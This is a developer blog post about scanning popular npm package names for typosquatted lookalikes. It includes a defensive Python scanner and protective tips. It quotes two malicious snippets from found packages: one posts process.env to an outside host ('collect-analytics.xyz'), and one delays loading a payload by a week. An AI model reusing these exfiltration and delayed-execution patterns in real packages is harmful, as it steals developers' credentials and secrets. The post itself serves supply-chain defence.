DEV Community

Alex Spinov

I Scanned 500 npm Packages for Typosquatting — 23 Were Suspicious

Last month, a developer on my team installed `colurs` instead of `colors`. One letter difference. The package existed, had 200+ weekly downloads, and contained code that silently posted environment variables to a remote server.

That incident made me wonder: how many of the 2+ million npm packages are typosquatting popular ones?

The Experiment

I wrote a script that:

  1. Took the top 500 most-downloaded npm packages
  2. Generated common typos (character swaps, missing letters, doubled letters, common misspellings)
  3. Checked if those typo-names existed as real packages
  4. Analyzed what those packages actually did
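The first three steps as a runnable sketch. This is an added example, not the author's npm-typosquat-scanner: the confusable map is an assumed stand-in for the "common misspellings" list the post does not show, and POPULAR and REGISTRY are constructed sets standing in for the top-500 list and a live registry lookup.

```python
"""Generate typo variants of popular package names, flag the ones that exist
on the registry, and offer a pre-install lookalike check (added example)."""

# Assumed "common misspellings" map; the post does not list the substitutions its
# scanner used, so this vowel/sibilant confusable table is a stand-in.
CONFUSABLE = {"o": "u", "u": "o", "i": "y", "y": "i", "s": "z", "z": "s", "e": "a", "a": "e"}


def typo_variants(name: str):
    """Swaps, missing letters, doubled letters and confusable substitutions."""
    n, variants = len(name), set()
    for i in range(n - 1):  # adjacent character swaps: colors -> cloors
        variants.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    for i in range(n):  # missing letters: colors -> color
        variants.add(name[:i] + name[i + 1:])
    for i in range(n):  # doubled letters: colors -> collors
        variants.add(name[:i] + name[i] + name[i:])
    for i, ch in enumerate(name):  # common misspellings: colors -> colurs
        if ch in CONFUSABLE:
            variants.add(name[:i] + CONFUSABLE[ch] + name[i + 1:])
    variants.discard(name)  # the real name is not a typo of itself
    variants.discard("")    # single-letter names would otherwise yield ""
    return variants


def scan_registry(popular, registry):
    """Map each typo variant that exists on the registry to the package(s) it imitates."""
    hits = {}
    for pkg in popular:
        for v in typo_variants(pkg):
            if v in registry and v not in popular:  # real package, not itself a popular one
                hits.setdefault(v, set()).add(pkg)
    return hits


def check_install(requested, popular):
    """Pre-install check: which popular packages does `requested` look like a typo of?"""
    if requested in popular:
        return set()
    return {pkg for pkg in popular if requested in typo_variants(pkg)}


# Constructed sample data standing in for the top-500 list and the live registry.
POPULAR = ["colors", "dotenv", "lodash", "express"]
REGISTRY = {"colors", "dotenv", "lodash", "express", "chalk", "colurs", "lodsh", "expres", "dot-env"}

if __name__ == "__main__":
    for variant, targets in sorted(scan_registry(POPULAR, REGISTRY).items()):
        print(f"{variant} exists and looks like a typo of {', '.join(sorted(targets))}")
```

`check_install` is the piece to wire into a pre-install hook: a requested name that is absent from the popular list but within one edit of it deserves a second look before `npm install` runs any scripts.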

The Results

Out of ~4,500 typo variations I generated, 347 existed as real packages. Most were legitimate (abandoned, joke packages, or unrelated). But 23 raised red flags:

  • 8 had install scripts that made network requests
  • 6 had obfuscated code in their `postinstall` hooks
  • 5 had suspiciously recent publishes (within 2 weeks) with names close to trending packages
  • 4 had dependency chains that pulled in known malicious packages

What the Suspicious Packages Did

The most common patterns:

1. Environment variable harvesting
```javascript
// Found in a package typosquatting "dotenv"
const https = require('https');
const data = JSON.stringify(process.env);
https.request({ hostname: 'collect-analytics.xyz', path: '/e', method: 'POST' });
```

2. Delayed execution
Some packages waited 7+ days before activating their payload. The install script set a timer:

```javascript
// Runs a week after install — past most security reviews
setTimeout(() => require('./payload'), 604800000);
```

3. Dependency confusion
Three packages had names matching internal package names commonly used at specific companies (found by scraping job postings for internal tool names).

How to Protect Yourself

After this experiment, I now do three things on every project:

1. Lock your registry
```ini
# .npmrc - only install from the official registry
registry=https://registry.npmjs.org/
```

2. Audit install scripts
```bash
# See what runs on install BEFORE installing: fetch the tarball without executing
# anything, then read its scripts (replace <package> with the package name)
npm pack <package> && tar -xzf <package>-*.tgz && jq '.scripts' package/package.json
```

3. Use npm audit with Socket.dev
npm audit catches known vulnerabilities. Socket.dev catches typosquatting and supply chain attacks specifically. Together they cover different threat vectors.

The Bigger Problem

npm has a reporting mechanism, but it took an average of 12 days for the suspicious packages I reported to be removed. During that time, they accumulated between 50 and 400 downloads each.

The real fix needs to happen at the registry level — fuzzy matching on package names during publish, mandatory 2FA for popular packages, and better automated scanning.

Your Turn

Have you ever accidentally installed a wrong package? What tools do you use to verify dependencies?

I built the scanning script as an open-source tool: npm-typosquat-scanner on GitHub. It's a Python script that takes a list of packages and checks for suspicious typo variants.


I write about API security and developer tools. If you're interested in supply chain security, follow me for more deep dives like this.


Next in this series: I Built a Supply Chain Scanner for Python — pip Has the Same Problem as npm